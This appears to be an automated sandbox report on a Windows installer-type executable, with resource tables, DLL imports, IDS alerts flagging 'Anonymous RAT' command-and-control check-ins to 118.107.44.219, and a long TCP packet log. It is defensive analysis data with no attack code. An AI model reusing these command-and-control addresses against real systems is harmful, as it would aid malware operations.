RT_ICON | 0x2fd424 | 0x75e | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0058324496288442
RT_ICON | 0x2fdb84 | 0xaf3 | PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced | English | United States | 1.0039243667499107
RT_ICON | 0x2fe678 | 0xb2d | PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced | English | United States | 1.0038448095071653
RT_ICON | 0x2ff1a8 | 0xd9f | PNG image data, 84 x 84, 8-bit/color RGBA, non-interlaced | English | United States | 1.003154574132492
RT_ICON | 0x2fff48 | 0xdc6 | PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031196823596142
RT_ICON | 0x300d10 | 0x12ca | PNG image data, 112 x 112, 8-bit/color RGBA, non-interlaced | English | United States | 1.0022869022869023
RT_ICON | 0x301fdc | 0xd03 | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 1.0033023116181328
RT_ICON | 0x302ce0 | 0x152c | PNG image data, 144 x 144, 8-bit/color RGBA, non-interlaced | English | United States | 1.002029520295203
                                                                                                                                                                                                            RT_ICON0x30420c0x16b5PNG image data, 160 x 160, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0006881128505074
                                                                                                                                                                                                            RT_ICON0x3058c40x1d96PNG image data, 168 x 168, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                                                                                                                                            RT_ICON0x30765c0x1a2aPNG image data, 192 x 192, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9905942072260376
                                                                                                                                                                                                            RT_ICON0x3090880x2a22PNG image data, 216 x 216, 8-bit/color RGBA, non-interlacedEnglishUnited States0.998887446690154
                                                                                                                                                                                                            RT_ICON0x30baac0x2c53PNG image data, 240 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9956816779765577
                                                                                                                                                                                                            RT_ICON0x30e7000x191cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.972775357809583
                                                                                                                                                                                                            RT_STRING0x31001c0x210data0.3125
                                                                                                                                                                                                            RT_STRING0x31022c0x440data0.37683823529411764
                                                                                                                                                                                                            RT_STRING0x31066c0x2b4data0.45809248554913296
                                                                                                                                                                                                            RT_STRING0x3109200x214data0.4605263157894737
                                                                                                                                                                                                            RT_STRING0x310b340x3e4data0.3885542168674699
                                                                                                                                                                                                            RT_STRING0x310f180x3a0data0.4191810344827586
                                                                                                                                                                                                            RT_STRING0x3112b80x1ecdata0.5609756097560976
                                                                                                                                                                                                            RT_STRING0x3114a40xccdata0.6666666666666666
                                                                                                                                                                                                            RT_STRING0x3115700x294data0.4681818181818182
                                                                                                                                                                                                            RT_STRING0x3118040x3e8data0.372
                                                                                                                                                                                                            RT_STRING0x311bec0x488data0.41293103448275864
                                                                                                                                                                                                            RT_STRING0x3120740x418data0.28435114503816794
                                                                                                                                                                                                            RT_STRING0x31248c0x370data0.4147727272727273
                                                                                                                                                                                                            RT_STRING0x3127fc0x39cdata0.41233766233766234
                                                                                                                                                                                                            RT_STRING0x312b980x4a4data0.382996632996633
                                                                                                                                                                                                            RT_STRING0x31303c0x384data0.37333333333333335
                                                                                                                                                                                                            RT_STRING0x3133c00x454data0.3935018050541516
                                                                                                                                                                                                            RT_STRING0x3138140x210data0.39015151515151514
                                                                                                                                                                                                            RT_STRING0x313a240xbcdata0.6542553191489362
                                                                                                                                                                                                            RT_STRING0x313ae00x100data0.62890625
                                                                                                                                                                                                            RT_STRING0x313be00x338data0.4223300970873786
                                                                                                                                                                                                            RT_STRING0x313f180x3f0data0.34226190476190477
                                                                                                                                                                                                            RT_STRING0x3143080x314data0.38578680203045684
                                                                                                                                                                                                            RT_STRING0x31461c0x2f8data0.38026315789473686
                                                                                                                                                                                                            RT_RCDATA0x3149140x10data1.5
                                                                                                                                                                                                            RT_RCDATA0x3149240x1800PE32+ executable (console) x86-64, for MS WindowsEnglishUnited States0.3924153645833333
                                                                                                                                                                                                            RT_RCDATA0x3161240xb70data0.5358606557377049
                                                                                                                                                                                                            RT_RCDATA0x316c940x147Delphi compiled form 'TMainForm'0.746177370030581
                                                                                                                                                                                                            RT_RCDATA0x316ddc0x480Delphi compiled form 'TNewDiskForm'0.5052083333333334
                                                                                                                                                                                                            RT_RCDATA0x31725c0x400Delphi compiled form 'TSelectFolderForm'0.5087890625
                                                                                                                                                                                                            RT_RCDATA0x31765c0x4b5Delphi compiled form 'TSelectLanguageForm'0.5004149377593361
                                                                                                                                                                                                            RT_RCDATA0x317b140x7e3Delphi compiled form 'TUninstallProgressForm'0.40713224368499257
                                                                                                                                                                                                            RT_RCDATA0x3182f80x55cDelphi compiled form 'TUninstSharedFileForm'0.41690962099125367
                                                                                                                                                                                                            RT_RCDATA0x3188540x2ac9Delphi compiled form 'TWizardForm'0.19811923673879303
                                                                                                                                                                                                            RT_GROUP_CURSOR0x31b3200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                            RT_GROUP_CURSOR0x31b3340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                            RT_GROUP_CURSOR0x31b3480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_CURSOR0x31b35c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_CURSOR0x31b3700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_CURSOR0x31b3840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_CURSOR0x31b3980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_ICON0x31b3ac0x148dataEnglishUnited States0.6524390243902439
                                                                                                                                                                                                            RT_GROUP_ICON0x31b4f40x30dataEnglishUnited States0.9375
                                                                                                                                                                                                            RT_GROUP_ICON0x31b5240x22dataEnglishUnited States1.0588235294117647
                                                                                                                                                                                                            RT_GROUP_ICON0x31b5480x30dataEnglishUnited States0.9375
                                                                                                                                                                                                            RT_GROUP_ICON0x31b5780x30dataEnglishUnited States0.9583333333333334
                                                                                                                                                                                                            RT_VERSION0x31b5a80x514dataEnglishUnited States0.3007692307692308
                                                                                                                                                                                                            RT_MANIFEST0x31babc0x244XML 1.0 document, ASCII text, with CRLF line terminatorsChineseChina0.453448275862069
DLL | Import
mpr.dll | WNetEnumResourceW, WNetGetUniversalNameW, WNetGetConnectionW, WNetCloseEnum, WNetOpenEnumW
comdlg32.dll | GetSaveFileNameW, GetOpenFileNameW
comctl32.dll | FlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, FlatSB_GetScrollInfo, ImageList_Write, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_Draw, ImageList_Remove
shell32.dll | SHBrowseForFolderW, SHGetMalloc, SHGetFileInfoW, SHChangeNotify, Shell_NotifyIconW, ShellExecuteW, SHGetPathFromIDListW, ShellExecuteExW
user32.dll | CopyImage, CreateWindowExW, GetMenuItemInfoW, SetMenuItemInfoW, DefFrameProcW, GetDCEx, GetMessageW, PeekMessageW, MonitorFromWindow, GetDlgCtrlID, ScrollWindowEx, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, FrameRect, MapVirtualKeyW, OffsetRect, IsWindowUnicode, RegisterWindowMessageW, FillRect, GetMenuStringW, DispatchMessageW, SendMessageA, DefMDIChildProcW, EnumWindows, GetClassInfoW, GetSystemMenu, WaitForInputIdle, ShowOwnedPopups, GetScrollRange, GetScrollPos, SetScrollPos, GetActiveWindow, SetActiveWindow, DrawEdge, InflateRect, GetKeyboardLayoutList, OemToCharBuffA, LoadBitmapW, DrawFocusRect, EnumChildWindows, GetScrollBarInfo, SendNotifyMessageW, ReleaseCapture, UnhookWindowsHookEx, LoadCursorW, GetCapture, SetCapture, CreatePopupMenu, ScrollWindow, ShowCaret, GetMenuItemID, GetLastActivePopup, CharLowerBuffW, GetSystemMetrics, SetWindowLongW, PostMessageW, DrawMenuBar, SetParent, IsZoomed, CharUpperBuffW, GetClientRect, IsChild, ClientToScreen, SetWindowPlacement, IsIconic, CallNextHookEx, GetMonitorInfoW, ShowWindow, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, SetForegroundWindow, GetWindowTextW, EnableWindow, DestroyWindow, IsDialogMessageW, EndMenu, RegisterClassW, CharNextW, GetWindowThreadProcessId, RedrawWindow, GetDC, GetFocus, SetFocus, EndPaint, ExitWindowsEx, ReleaseDC, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, GetClassLongW, ActivateKeyboardLayout, GetParent, CharToOemBuffA, DrawTextW, SetScrollRange, InsertMenuItemW, PeekMessageA, GetPropW, SetClassLongW, MessageBoxW, MessageBeep, SetPropW, SetRectEmpty, UpdateWindow, RemovePropW, GetSubMenu, MsgWaitForMultipleObjects, DestroyMenu, DestroyIcon, SetWindowsHookExW, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, AdjustWindowRectEx, DrawIcon, IsWindow, EnumThreadWindows, InvalidateRect, GetKeyboardState, DrawFrameControl, ScreenToClient, SendMessageTimeoutW, BringWindowToTop, SetCursor, CreateIcon, CreateMenu, LoadStringW, CharLowerW, SetWindowPos, SetWindowRgn, GetMenuItemCount, RemoveMenu, AppendMenuW, GetSysColorBrush, GetKeyboardLayoutNameW, GetWindowDC, TranslateMessage, DrawTextExW, MapWindowPoints, EnumDisplayMonitors, CallWindowProcW, DestroyCursor, ReplyMessage, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, EnableScrollBar, GetSysColor, TrackPopupMenu, DrawIconEx, PostQuitMessage, GetClassNameW, ShowScrollBar, EnableMenuItem, GetIconInfo, GetMessagePos, LoadImageW, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, GetCursorPos, SetCursorPos, HideCaret, GetMenu, GetMenuState, SetMenu, SetRect, GetKeyState, FindWindowExW, MonitorFromPoint, SystemParametersInfoW, LoadIconW, GetCursor, GetWindow, GetWindowLongW, GetWindowRect, InsertMenuW, KillTimer, WaitMessage, IsWindowEnabled, IsDialogMessageA, TranslateMDISysAccel, GetWindowPlacement, FindWindowW, DeleteMenu, GetKeyboardLayout
version.dll | GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
oleaut32.dll | SafeArrayPutElement, LoadTypeLib, GetErrorInfo, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, SafeArrayCreate, SafeArrayGetElement, GetActiveObject, SysAllocStringLen, SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, RegisterTypeLib, VariantChangeType, VariantCopyInd
advapi32.dll | RegSetValueExW, ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, GetUserNameW, RegQueryInfoKeyW, EqualSid, GetTokenInformation, RegCreateKeyExW, SetSecurityDescriptorDacl, RegEnumKeyExW, AdjustTokenPrivileges, RegDeleteKeyW, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, RegDeleteValueW, RegFlushKey, RegEnumValueW, RegQueryValueExW, ConvertSidToStringSidW, RegCloseKey, InitializeSecurityDescriptor
netapi32.dll | NetWkstaGetInfo, NetApiBufferFree
msvcrt.dll | memcpy
winhttp.dll | WinHttpGetIEProxyConfigForCurrentUser, WinHttpSetTimeouts, WinHttpSetStatusCallback, WinHttpConnect, WinHttpReceiveResponse, WinHttpQueryAuthSchemes, WinHttpGetProxyForUrl, WinHttpReadData, WinHttpCloseHandle, WinHttpQueryHeaders, WinHttpOpenRequest, WinHttpAddRequestHeaders, WinHttpOpen, WinHttpWriteData, WinHttpSetCredentials, WinHttpQueryDataAvailable, WinHttpSetOption, WinHttpSendRequest, WinHttpQueryOption
kernel32.dll | SetFileAttributesW, SetFileTime, GetACP, GetExitCodeProcess, IsBadWritePtr, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, VirtualProtect, TerminateThread, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, HeapAlloc, ExitProcess, WriteProfileStringW, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, GetModuleHandleW, FreeLibrary, HeapDestroy, CompareFileTime, ReadFile, CreateProcessW, TransactNamedPipe, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, OpenMutexW, CreateThread, CompareStringW, CopyFileW, CreateMutexW, LoadLibraryA, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, MoveFileW, GlobalAddAtomW, GetSystemTimeAsFileTime, FormatMessageW, OpenProcess, SwitchToThread, GetExitCodeThread, OutputDebugStringW, GetCurrentThread, GetLogicalDrives, LocalFileTimeToFileTime, SetNamedPipeHandleState, LoadLibraryExW, TerminateProcess, LockResource, FileTimeToSystemTime, GetShortPathNameW, GetCurrentThreadId, UnhandledExceptionFilter, MoveFileExW, GlobalFindAtomW, VirtualQuery, GlobalFree, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, ReleaseMutex, FlushFileBuffers, LoadResource, SuspendThread, GetTickCount, WritePrivateProfileStringW, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, GetCurrentDirectoryW, SetCurrentDirectoryW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, GetCurrentProcess, SetThreadPriority, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, DeviceIoControl, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, lstrcmpW, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateNamedPipeW, ExitThread, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, GetComputerNameW, IsValidLocale, TlsSetValue, CreateDirectoryW, GetOverlappedResult, GetSystemDefaultUILanguage, EnumCalendarInfoW, GetProfileStringW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, IsDBCSLeadByte, CreateEventW, GetPrivateProfileStringW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
ole32.dll | StgCreateDocfileOnILockBytes, CoCreateInstance, CLSIDFromString, CoUninitialize, IsEqualGUID, OleInitialize, CoFreeUnusedLibraries, CreateILockBytesOnHGlobal, CLSIDFromProgID, OleUninitialize, CoDisconnectObject, CoInitialize, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID
gdi32.dll | Arc, Pie, SetBkMode, SelectPalette, CreateCompatibleBitmap, ExcludeClipRect, RectVisible, SetWindowOrgEx, MaskBlt, AngleArc, Chord, SetTextColor, StretchBlt, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, RoundRect, RestoreDC, SetRectRgn, GetTextMetricsW, RemoveFontResourceW, GetWindowOrgEx, CreatePalette, CreateBrushIndirect, PatBlt, LineDDA, PolyBezierTo, GetStockObject, CreateSolidBrush, Polygon, Rectangle, MoveToEx, DeleteDC, SaveDC, BitBlt, Ellipse, FrameRgn, GetDeviceCaps, GetBitmapBits, GetTextExtentPoint32W, GetClipBox, Polyline, IntersectClipRect, GetSystemPaletteEntries, CreateBitmap, AddFontResourceW, CreateDIBitmap, GetStretchBltMode, CreateDIBSection, CreatePenIndirect, SetStretchBltMode, GetDIBits, CreateFontIndirectW, PolyBezier, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, DeleteObject, SelectObject, ExtFloodFill, UnrealizeObject, SetBkColor, CreateCompatibleDC, GetObjectW, GetBrushOrgEx, GetCurrentPositionEx, SetROP2, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, ArcTo, GdiFlush, SetPixel, EnumFontFamiliesExW, GetPaletteEntries
Name | Ordinal | Address
TMethodImplementationIntercept | 3 | 0x4b5e78
__dbk_fcall_wrapper | 2 | 0x410a7c
dbkFCallWrapperAddr | 1 | 0x6d4640
Language of compilation system | Country where language is spoken
English | United States
Chinese | China
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-29T09:02:09.456478+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 49738 | 118.107.44.219 | 19091 | TCP
2024-12-29T09:03:19.528655+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 49744 | 118.107.44.219 | 19091 | TCP
2024-12-29T09:04:30.575700+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 49891 | 118.107.44.219 | 19092 | TCP
2024-12-29T09:05:42.606786+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 50026 | 118.107.44.219 | 19091 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                            Dec 29, 2024 09:01:57.868292093 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:57.988243103 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:57.988348007 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:58.446388006 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:01:58.446441889 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:58.446527004 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:01:58.456967115 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:01:58.456981897 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.343931913 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.343961954 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.343971968 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.344021082 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.344038010 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.344054937 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.344070911 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.344115973 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.344156981 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.344261885 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.344290972 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.344309092 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.344321966 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.344351053 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.463804960 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.463855982 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.463907003 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.467854977 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.512974024 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.557212114 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.557322979 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.557393074 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.561255932 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.561314106 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.561372995 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.569610119 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.569823027 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.569885015 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.577594995 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.577719927 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.577769041 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.585966110 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.586074114 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.586122990 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.594404936 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.594492912 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.594552994 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.602771044 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.602854967 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.602921963 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.611164093 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.611279011 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.611330032 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.619544983 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.619640112 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.619697094 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.627947092 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.628113985 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.628161907 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.636377096 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.636465073 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.636683941 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.677162886 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.677202940 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.677265882 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.770698071 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.770816088 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.770905018 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.773081064 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.773138046 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.773205042 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.777244091 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.777456045 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.777510881 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.782594919 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.782716036 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.782771111 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.787914991 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.788037062 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.788090944 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.793270111 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.793399096 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.793453932 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.798710108 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.798899889 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.798953056 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.803993940 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.804137945 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.804192066 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.809429884 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.809534073 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.809587002 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.813193083 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.813358068 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.813411951 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.816978931 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.817110062 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.817272902 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.820792913 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.820928097 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.820983887 CET497348853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.824740887 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:59.824795008 CET885349734118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.203293085 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.203347921 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.203363895 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.203417063 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.203417063 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.210870028 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.210897923 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.210942030 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.210966110 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.211108923 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.211108923 CET49735443192.168.2.4149.129.12.34
